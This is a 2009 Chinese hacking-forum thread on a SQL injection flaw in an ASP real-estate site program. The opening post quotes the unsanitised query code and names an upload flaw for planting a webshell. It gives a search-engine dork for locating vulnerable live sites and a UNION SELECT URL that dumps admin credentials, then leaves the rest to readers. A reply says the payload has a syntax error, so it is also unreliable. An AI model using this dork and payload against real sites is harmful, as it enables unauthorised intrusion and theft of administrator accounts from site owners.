返回列表 发帖
柔肠寸断

Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15

帖子
3852 
积分
13044 
威望
16780  
金钱
36761  
在线时间
1139 小时 

管理组高手勋章核心成员原创奖章帅哥勋章突出贡献奖优质人品奖章论坛元老管理组成员技术组成员
1 跳转到 » 倒序看帖
打印
tT
发表于 2009-8-11 17:54 | 只看该作者

房产程序 v1.0注射漏洞分析

注射, 程序, 漏洞, 房产
程序代码
  1. 核心提示:漏洞文件:newsshow.asp漏洞代码:% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...
复制代码
漏洞文件:newsshow.asp



漏洞代码:


程序代码
  1. <%
  2. set rs=server.createobject("adodb.recordset")
  3. sql="update news set hit=hit+1 where ID="&request("id")
  4. rs.open sql,conn,1,3
  5. %>
  6. <%
  7. set rs=server.CreateObject("adodb.recordset")
  8. sql="select * from news where ID="&request("id")
  9. rs.open sql,conn
  10. %>
复制代码
只分析了这一个,



任意上传漏洞:upfile.asp



有兴趣的可以分析下利用上传拿WEBSHELL



搜索关键词:inurl:baodianlist.asp+信息中心



然后输入
  1. http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin
复制代码
爆出管理帐号密码



后台登陆地址:admin.asp



剩下的自己搞吧!
收藏 分享
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰
于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

dsa3027235

Rank: 7Rank: 7Rank: 7

帖子
272 
积分
608 
威望
703  
金钱
1365  
在线时间
55 小时 

VIP会员支持奖章优质人品奖章
2
发表于 2009-8-11 21:07 | 只看该作者
laodao  woai ni
有什么问题GOOGLE一下

TOP

wyw12340

Rank: 1

帖子
20 
积分
25 
威望
30  
金钱
20  
在线时间
0 小时 
3
发表于 2009-8-12 12:18 | 只看该作者
1# 柔肠寸断



高人   支持   顶

TOP

Ksnort

Rank: 9Rank: 9Rank: 9

帖子
154 
积分
616 
威望
754  
金钱
898  
在线时间
81 小时 

贡献奖内部成员突出贡献奖优秀版主管理组成员
4
发表于 2009-8-12 14:01 | 只看该作者
很不幸的告诉你 ···最后那个联合查询语法错误··

TOP

enterer

Rank: 2

帖子
10 
积分
70 
威望
97  
金钱
77  
在线时间
8 小时 
5
发表于 2009-8-14 21:13 | 只看该作者
后台貌似很容易进 不过也太简陋了 ...上传还有限制 对于我这个菜鸟无法拿shell

TOP

返回列表